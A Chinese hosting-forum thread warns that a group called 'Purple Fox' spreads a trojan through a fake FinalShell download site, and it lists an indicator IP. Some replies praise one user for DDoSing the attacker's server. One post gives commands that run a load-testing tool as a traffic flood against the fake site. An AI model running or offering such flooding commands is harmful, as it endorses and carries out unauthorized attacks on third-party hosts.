全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 2761|回复: 35
打印 上一主题 下一主题

[经验] 发现新恶意团伙"紫狐"!针对finalshell的供应链事件

[复制链接]
跳转到指定楼层
1#
发表于 2023-11-7 23:29:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
https://mp.weixin.qq.com/s/rAsN9k5fdI5nf9sJ4kZVTw


大家下载时,注意分辨。
推荐
发表于 2023-11-8 08:15:28 | 只看该作者
我给他释放木马用的服务器D死了

点评

点赞了  发表于 2023-12-2 09:48
正义之师  发表于 2023-11-9 16:16
这个星期你最帅  发表于 2023-11-8 20:29
正义之举  发表于 2023-11-8 12:23
666  发表于 2023-11-8 12:23
推荐
发表于 2023-11-8 08:44:51 | 只看该作者
wget https://github.com/maintell/webBenchmark/releases/download/0.5/webBenchmark_linux_x64
chmod +x webBenchmark_linux_x64
./webBenchmark_linux_x64 -c 32 -s https://finalshell.org/downloads/finalshell_install.pkg
推荐
发表于 2023-11-8 08:08:54 | 只看该作者
这种东西我都直接记住域名,搜索引擎会出来一堆牛鬼蛇神
认准hostbuf.com
推荐
发表于 2023-11-7 23:33:38 | 只看该作者
在执行流程中,可追溯到这个IP:107.148.48.35

这个 IP 来自于 install_8.exe ,此时再结合沙箱释放文本中的检出,大概可以实锤这个 install_8.exe 是木马了


107.148.48.35 PEG TECH INC
raksmart.com
推荐
发表于 2023-11-8 08:06:17 | 只看该作者
居然认真的看完了!!
28#
发表于 2023-11-8 20:24:53 | 只看该作者




小尾巴~~~~~

看签名>>>
27#
发表于 2023-11-8 20:23:49 | 只看该作者
cany 发表于 2023-11-8 08:15
我给他释放木马用的服务器D死了

正义之举
26#
发表于 2023-11-8 12:20:57 | 只看该作者
已经上cf了,十有**这些玩意儿都潜伏在loc里面
25#
发表于 2023-11-8 11:47:22 | 只看该作者
这玩意儿的网站居然在谷歌拍第二名,
24#
发表于 2023-11-8 11:45:16 | 只看该作者
cany 发表于 2023-11-8 08:15
我给他释放木马用的服务器D死了

还得是你
23#
发表于 2023-11-8 11:43:00 来自手机 | 只看该作者
老用户都知道作者官网长什么样,就怕新用户可能会中招。
22#
 楼主| 发表于 2023-11-8 11:19:40 来自手机 | 只看该作者
cany 发表于 2023-11-8 08:15
我给他释放木马用的服务器D死了

就喜欢人狠话不多的大佬
21#
发表于 2023-11-8 09:44:01 | 只看该作者
caigou 发表于 2023-11-8 08:35
话说回来, 要不是这个文章,我一定会点击finalshell.org的...

第一次肯定会犯迷糊
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-5-27 20:57 , Processed in 0.074285 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表